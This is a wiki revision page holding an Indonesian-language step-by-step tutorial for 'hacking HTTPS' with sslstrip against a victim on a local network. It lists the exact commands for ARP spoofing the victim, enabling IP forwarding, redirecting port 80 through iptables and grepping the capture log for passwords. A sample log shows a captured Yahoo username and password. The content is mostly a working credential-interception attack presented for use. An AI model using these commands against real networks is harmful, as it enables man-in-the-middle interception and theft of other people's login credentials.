Difference between revisions of "Backtrack: sslstrip - hacking https"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) (New page: Sumber: http://indobacktrack.or.id/2009/07/sslstrip-hacking-https/ kali ini saya coba menjelaskan tentang hacking https connection menggunakan sslstrip.. langsung ke TKP…berikut adalah...) |
Onnowpurbo (talk | contribs) |
||
Line 55: | Line 55: | ||
url+="?";if(valid_js()){var passwd=form.passwd.value;var challen | url+="?";if(valid_js()){var passwd=form.passwd.value;var challen | ||
function hash2(form){var passwd=form.passwd.value | function hash2(form){var passwd=form.passwd.value | ||
− | 2009-06-30 19:22:34,004 SECURE POST Data (login.yahoo.com): .tries=1&.src=ym&.md5=&.hash=&.js=&.last=promo=&.intl=us&.bypass=&.partner=&.u=1esn43t54k0a5&.v=0&.challenge=EzdOJPTgncnTmCU_K. | + | 2009-06-30 19:22:34,004 SECURE POST Data (login.yahoo.com): |
− | IjpAtfSawf&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%3D0%26c%3D%26ivt%3D%26sg%3D&login=bl4ck.4ngle&passwd=disembunyikan&.save=Sign+In | + | .tries=1&.src=ym&.md5=&.hash=&.js=&.last=promo=&.intl=us&.bypass=&.partner=&.u=1esn43t54k0a5&.v=0& |
+ | .challenge=EzdOJPTgncnTmCU_K.IjpAtfSawf&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done= | ||
+ | http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%3D0%26c%3D%26ivt%3D%26sg%3D&login='''bl4ck.4ngle'''&passwd='''disembunyikan'''&.save=Sign+In | ||
kita bisa melihat bahwa username = bl4ck.4ngle dan password = disembunyikan | kita bisa melihat bahwa username = bl4ck.4ngle dan password = disembunyikan |
Revision as of 07:36, 3 June 2010
Sumber: http://indobacktrack.or.id/2009/07/sslstrip-hacking-https/
kali ini saya coba menjelaskan tentang hacking https connection menggunakan sslstrip..
langsung ke TKP…berikut adalah beberapa informasi mengenai jaringan :
ip attacker : 192.168.1.50 ip victim : 192.168.1.200 gateway : 192.168.1.5
sekilas mengenai sslstrip :
root@h4ck:~# sslstrip --help sslstrip 0.1 by Moxie Marlinspike Usage: sslstrip Options: -w , –write= Specify file to log to (optional). -p , –post Log only SSL POSTs. (default) -s , –ssl Log all SSL traffic to and from server. -a , –all Log all SSL and HTTP traffic to and from server. -l , –listen= Port to listen on (default 10000). -f , –favicon Substitute a lock favicon on secure requests. -k , –killsessions Kill sessions in progress. -h Print this help message
note :
-opsi -a digunakan untuk logging semua trafic ( http,https) -opsi -s digunakan untuk logging traficc ssl saja -opsi -l digunakan untuk listen port ( meredirect port 80 victim,defaultnya 10000 ) -opsi : -w : tempat file dump akan disimpan.
Langkah hacking https
- jalankan ssl strip :
root@h4ck:~# sslstrip -a -w laharisi
- Lakukan arpspoof terhadap victim
root@h4ck:~# root@h4ck:~# arpspoof -i vmnet1 -t 192.168.1.200 192.168.1.5
- akftifkan fungsi ip_forward :
root@h4ck:~# echo 1 > /proc/sys/net/ipv4/ip_forward
- redirect komunikasi http victim ( port 80 ) ke port yang di gunakan sslstrip ( 10000)
root@h4ck:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
- ketika victim melakukan login misalnya mail.yahoo.com,maka kita bisa melihat username dan password loginnya..caranya buka file dump ( laharisi )
root@h4ck:~# cat laharisi | grep -i "passwd=" url+="?";if(valid_js()){var passwd=form.passwd.value;var challen function hash2(form){var passwd=form.passwd.value 2009-06-30 19:22:34,004 SECURE POST Data (login.yahoo.com): .tries=1&.src=ym&.md5=&.hash=&.js=&.last=promo=&.intl=us&.bypass=&.partner=&.u=1esn43t54k0a5&.v=0& .challenge=EzdOJPTgncnTmCU_K.IjpAtfSawf&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done= http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%3D0%26c%3D%26ivt%3D%26sg%3D&login=bl4ck.4ngle&passwd=disembunyikan&.save=Sign+In
kita bisa melihat bahwa username = bl4ck.4ngle dan password = disembunyikan